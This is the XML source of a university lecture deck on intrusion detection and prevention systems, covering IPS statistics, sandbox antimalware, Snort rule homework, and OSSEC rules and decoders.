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404" r:id="rId3"/>
    <p:sldId id="398" r:id="rId4"/>
    <p:sldId id="467" r:id="rId5"/>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="468" r:id="rId8"/>
    <p:sldId id="405" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="400" r:id="rId12"/>
    <p:sldId id="426" r:id="rId13"/>
    <p:sldId id="429" r:id="rId14"/>
    <p:sldId id="427" r:id="rId15"/>
    <p:sldId id="428" r:id="rId16"/>
    <p:sldId id="439" r:id="rId17"/>
    <p:sldId id="440" r:id="rId18"/>
    <p:sldId id="412" r:id="rId19"/>
    <p:sldId id="402" r:id="rId20"/>
    <p:sldId id="443" r:id="rId21"/>
    <p:sldId id="449" r:id="rId22"/>
    <p:sldId id="450" r:id="rId23"/>
    <p:sldId id="447" r:id="rId24"/>
    <p:sldId id="448" r:id="rId25"/>
    <p:sldId id="444" r:id="rId26"/>
    <p:sldId id="445" r:id="rId27"/>
    <p:sldId id="446" r:id="rId28"/>
    <p:sldId id="403" r:id="rId29"/>
    <p:sldId id="425" r:id="rId30"/>
    <p:sldId id="399" r:id="rId31"/>
    <p:sldId id="406" r:id="rId32"/>
    <p:sldId id="286" r:id="rId33"/>
    <p:sldId id="307" r:id="rId34"/>
    <p:sldId id="413" r:id="rId35"/>
    <p:sldId id="416" r:id="rId36"/>
    <p:sldId id="414" r:id="rId37"/>
    <p:sldId id="415" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="290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441" r:id="rId51"/>
    <p:sldId id="430" r:id="rId52"/>
    <p:sldId id="469" r:id="rId53"/>
    <p:sldId id="308" r:id="rId54"/>
    <p:sldId id="314" r:id="rId55"/>
    <p:sldId id="315" r:id="rId56"/>
    <p:sldId id="316" r:id="rId57"/>
    <p:sldId id="352" r:id="rId58"/>
    <p:sldId id="432" r:id="rId59"/>
    <p:sldId id="433" r:id="rId60"/>
    <p:sldId id="417" r:id="rId61"/>
    <p:sldId id="353" r:id="rId62"/>
    <p:sldId id="354" r:id="rId63"/>
    <p:sldId id="355" r:id="rId64"/>
    <p:sldId id="358" r:id="rId65"/>
    <p:sldId id="359" r:id="rId66"/>
    <p:sldId id="360" r:id="rId67"/>
    <p:sldId id="361" r:id="rId68"/>
    <p:sldId id="356" r:id="rId69"/>
    <p:sldId id="362" r:id="rId70"/>
    <p:sldId id="431" r:id="rId71"/>
    <p:sldId id="357" r:id="rId72"/>
    <p:sldId id="321" r:id="rId73"/>
    <p:sldId id="322" r:id="rId74"/>
    <p:sldId id="470" r:id="rId75"/>
    <p:sldId id="323" r:id="rId76"/>
    <p:sldId id="419" r:id="rId77"/>
    <p:sldId id="451" r:id="rId78"/>
    <p:sldId id="452" r:id="rId79"/>
    <p:sldId id="471" r:id="rId80"/>
    <p:sldId id="473" r:id="rId81"/>
    <p:sldId id="475" r:id="rId82"/>
    <p:sldId id="474" r:id="rId83"/>
    <p:sldId id="476" r:id="rId84"/>
    <p:sldId id="418" r:id="rId85"/>
    <p:sldId id="325" r:id="rId86"/>
    <p:sldId id="327" r:id="rId87"/>
    <p:sldId id="407" r:id="rId88"/>
    <p:sldId id="338" r:id="rId89"/>
    <p:sldId id="339" r:id="rId90"/>
    <p:sldId id="340" r:id="rId91"/>
    <p:sldId id="341" r:id="rId92"/>
    <p:sldId id="346" r:id="rId93"/>
    <p:sldId id="342" r:id="rId94"/>
    <p:sldId id="343" r:id="rId95"/>
    <p:sldId id="344" r:id="rId96"/>
    <p:sldId id="345" r:id="rId97"/>
    <p:sldId id="364" r:id="rId98"/>
    <p:sldId id="365" r:id="rId99"/>
    <p:sldId id="366" r:id="rId100"/>
    <p:sldId id="367" r:id="rId101"/>
    <p:sldId id="368" r:id="rId102"/>
    <p:sldId id="363" r:id="rId103"/>
    <p:sldId id="420" r:id="rId104"/>
    <p:sldId id="421" r:id="rId105"/>
    <p:sldId id="422" r:id="rId106"/>
    <p:sldId id="326" r:id="rId107"/>
    <p:sldId id="423" r:id="rId108"/>
    <p:sldId id="291" r:id="rId109"/>
    <p:sldId id="459" r:id="rId1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58"/>
    <p:restoredTop sz="94540"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="1096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4/1/22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4/1/22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ysinternals/downloads/sysm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twitter.com/baphometadata/status/960003927818276864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wiftOnSecurity/sysmon-confi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technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashed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technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashe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haggis_m/splunking-the-endpoint-threat-hunting-with-sysmon-9dd956e3e1bd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thewire.org/wargames/bandit/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co.u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.mit.edu/mprat/Public/web/Terminus/Web/main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base.professionallyevil.com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rkdog/pulledpork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zeek.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zeek.org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old.zeek.org/documentation/tutorials/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://try.zeek.org/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Tools for Information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ENPM 685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09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Types of Differentiation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Signature-based (most)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Anomaly-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> Protocol Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3233137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Micro Deep Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-30 at 4.59.0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89" b="-24689"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="157163" y="542925"/>
            <a:ext cx="8980714" cy="5657850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35630381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Micro Deep Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-30 at 4.59.3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442" r="-85442"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-314326" y="1185862"/>
            <a:ext cx="8640535" cy="5443537"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22090254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Antimalware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FireEye</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sourcefire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Cisco’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FireAMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Palo Alto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WildFire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fire Fire Everywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capture documents and links as they cross the network, come into email servers, outgoing via web proxies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and process those files and links in sandbox virtual machines and look for signs of bad things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you see a bad thing alert for remediation and add to known bad list so can block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very powerful, very expensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335094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 descr="Screen Shot 2016-06-30 at 1.31.4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7" r="-697"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="400050"/>
            <a:ext cx="9071429" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27456509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6-06-30 at 1.34.1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484" r="-56484"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-562526" y="0"/>
            <a:ext cx="10160000" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4597932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6-06-30 at 1.34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19" r="-44619"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-580067" y="274638"/>
            <a:ext cx="9724067" cy="6126162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591930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Threat Prevention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Shift from vulnerabilities/exploits to focus on IP addresses/domains/Indicators of Compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Campus IPS stats last 30 days (June 2015, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>TippingPoint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Total hits: 8,901,999 (~296,733/day)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reputational IP/DNS hits: 6,473,327 (72.7%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Non Rep hits: 2,428,672 (27.3%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Campus IPS stats last 24 hours (6/29/16, Palo Alto)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Total hits: 8,413,269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750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D94AC-9D9B-EC4C-B9C2-79F9784C1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threat prevention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AA445-B108-334D-91E2-2DE9A810B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Campus IPS stats last 24 hours (2/8/18, Palo Alto)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Total hits: 17,406,572</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alerts (17,003,452) – low level stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block IP (5,204) – SSH brute force, port scanning, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block URL (79,487) – Known bad webpages (malware)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drop (294,593) – Known bad traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reset (12,994) – Known bad traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sinkhole (6,897) – Bad DNS hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (remaining…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>296,733 -&gt; 8.4M -&gt; 17.4M (399k blocked)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33091298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The Golden Rule of IDS/IPS rule writing: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Write to the vulnerability, not the exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28200435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43C8-F2C4-3144-9547-18A54F91F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HW #6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9B515-EF39-C542-851B-EB92440D0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a packet capture and develop 2 snort rules based on the requirements in the homework document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review a snort rule and recommend how to improve it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216164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Host-based IDS/IPS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Open source examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>OSSEC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tripwire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Commercial examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Trend Micro Deep Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tripwire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C19A7-B7D3-AB49-A28A-CBDB12CB2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OSSEC -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8887E-FE04-EA4A-A943-F8F41B898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Open-sourced host-based IDS developed by Daniel Cid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial release 2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquired by Trend Micro in 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“checks the box” for PCI DSS 1.2/2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File integrity checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows registry monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Root kit detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real-time alerting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3286211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1FD19-8FA7-AB4A-AFAB-62A9B4F2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OSSEC -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A9D7B-510A-3543-AF82-3499F236B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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can either install standalone (what we’ll do) or use as part of a distributed network (aka agent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agent, sends it’s logs to a Linux server for processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302173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D6F5E-FCD0-324D-B203-B1BFB9FC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OSSEC – Supported Log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D3641-DEB0-F54A-A1F1-711E79C1F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Unix: PAM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Windows: Event, Security, Application logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Firewall: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, Windows Firewall, Cisco ASA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>IDS: Snort logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>WWW: Apache access/error logs, IIS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DB: MySQL and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>PostreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800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19962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5849-2A20-4447-8067-0BD31C8E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OSSEC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C27F6-1CE8-8E4A-BD41-D67A3D25E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Rules are written in XML and kept in $OSSEC_HOME/rules (ex: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ossec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/rules)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: (from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php.rules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&lt;rule id="31402" level="0"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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 &lt;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if_sid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&gt;31301, 30101&lt;/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if_sid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11430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 &lt;match&gt;PHP Fatal error: &lt;/match&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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 &lt;description&gt;PHP Fatal error.&lt;/description&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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&lt;/rule&gt;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33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510F8-44CC-4642-989A-96F3F025F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OSSEC Decoders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3F07C-8AC2-3E4B-AE37-84A44D39B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regular expression that parses up the log to extract important fields (log message, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IP,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Decoder info stored in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ossec</a:t>
            </a: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decoder.xml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558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FFB29-DD4F-C141-9101-CD39AD20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OSSEC Decoders – SSH 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CCC09-976D-CC42-B302-3DDF80320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b="1" dirty="0"/>
              <a:t>&lt;decoder name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>"&gt;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>program_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>program_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/decoder&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;decoder name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>-success"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;parent&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/parent&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>prematch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;^Accepted&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>prematch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;regex offset="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
